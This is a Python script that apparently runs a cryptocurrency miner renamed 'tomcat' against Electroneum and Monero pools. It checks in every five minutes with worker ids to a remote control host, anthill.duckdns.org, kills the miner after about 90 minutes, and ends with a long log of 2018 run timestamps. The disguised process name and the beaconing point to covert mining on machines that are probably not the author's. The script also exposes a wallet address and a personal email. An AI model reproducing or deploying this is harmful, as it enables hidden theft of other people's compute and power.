import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:01.346127
#2018-02-17 17:13:07.469780
#2018-02-17 19:01:06.363205
#2018-02-17 20:48:03.128376
#2018-02-17 22:35:06.252616
#2018-02-18 00:18:07.006546
#2018-02-18 02:09:01.784722
#2018-02-18 03:56:05.952757
#2018-02-18 05:46:05.543274
#2018-02-18 07:39:03.683651
#2018-02-18 09:25:07.729456
#2018-02-18 11:12:07.620283
#2018-02-18 12:59:05.015700
#2018-02-18 14:46:04.129519
#2018-02-18 16:34:06.751062
#2018-02-18 18:23:02.092342
#2018-02-18 20:09:01.409215
#2018-02-18 21:55:07.379563
#2018-02-18 23:44:02.096357
#2018-02-19 01:30:01.433725
#2018-02-19 03:19:01.286156
#2018-02-19 05:04:07.117026
#2018-02-19 06:49:04.279784
#2018-02-19 08:39:05.452634
#2018-02-19 10:28:06.687223
#2018-02-19 12:16:09.478070
#2018-02-19 14:04:08.946788
#2018-02-19 15:54:07.647931
#2018-02-19 17:43:04.918949
#2018-02-19 19:32:07.808048
#2018-02-19 21:21:06.479182
#2018-02-19 23:07:07.680707
#2018-02-20 00:51:01.435620
#2018-02-20 02:40:08.656081
#2018-02-20 04:29:04.915118
#2018-02-20 06:13:04.592271
#2018-02-20 07:58:05.087142
#2018-02-20 09:43:07.424101
#2018-02-20 11:27:05.177383
#2018-02-20 13:14:04.716687
#2018-02-20 15:00:10.037172
#2018-02-20 16:45:12.715365
#2018-02-20 18:34:10.752754
#2018-02-20 20:24:10.090966
#2018-02-20 22:11:04.747772
#2018-02-20 23:51:05.339665
#2018-02-21 01:35:07.306257
#2018-02-21 03:22:07.810423
#2018-02-21 05:11:07.452146
#2018-02-21 06:59:05.926938
#2018-02-21 08:46:01.734823
#2018-02-21 10:33:09.260520
#2018-02-21 12:23:06.322583
#2018-02-21 14:09:02.198332
#2018-02-21 15:56:05.873612
#2018-02-21 17:47:09.912940
#2018-02-21 19:34:05.961602
#2018-02-21 21:23:06.280566
#2018-02-21 23:09:01.504581
#2018-02-22 00:58:06.801983
#2018-02-22 02:46:05.375672
#2018-02-22 04:32:04.337276
#2018-02-22 06:17:04.555030
#2018-02-22 08:02:06.674124
#2018-02-22 09:51:08.721466
#2018-02-22 11:36:06.850986
#2018-02-22 13:22:09.389485
#2018-02-22 15:10:08.792478
#2018-02-22 16:53:06.414623
#2018-02-22 18:42:08.830769
#2018-02-22 20:34:06.810703
#2018-02-22 22:19:05.331139
#2018-02-23 00:04:06.207832
#2018-02-23 01:53:06.828140
#2018-02-23 03:47:05.292955
#2018-02-23 05:39:07.017058
#2018-02-23 07:24:04.303822
#2018-02-23 09:27:01.435290
#2018-02-23 11:32:07.905702
#2018-02-23 13:23:07.172599
#2018-02-23 15:10:09.457870
#2018-02-23 16:59:09.359716
#2018-02-23 18:48:05.213678
#2018-02-23 20:35:06.367355
#2018-02-23 22:22:01.692424
#2018-02-24 00:07:07.350397
#2018-02-24 01:59:07.059166
#2018-02-24 03:50:05.456340
#2018-02-24 05:39:05.203715
#2018-02-24 07:31:04.105555
#2018-02-24 09:17:03.758416
#2018-02-24 11:09:03.878171
#2018-02-24 12:57:07.007315
#2018-02-24 14:45:07.047081
#2018-02-24 16:37:05.560043
#2018-02-24 18:25:07.590685
#2018-02-24 20:11:06.538070
#2018-02-24 21:59:07.168169
#2018-02-25 00:58:07.236028
#2018-02-25 04:33:07.098264
#2018-02-25 08:00:01.491840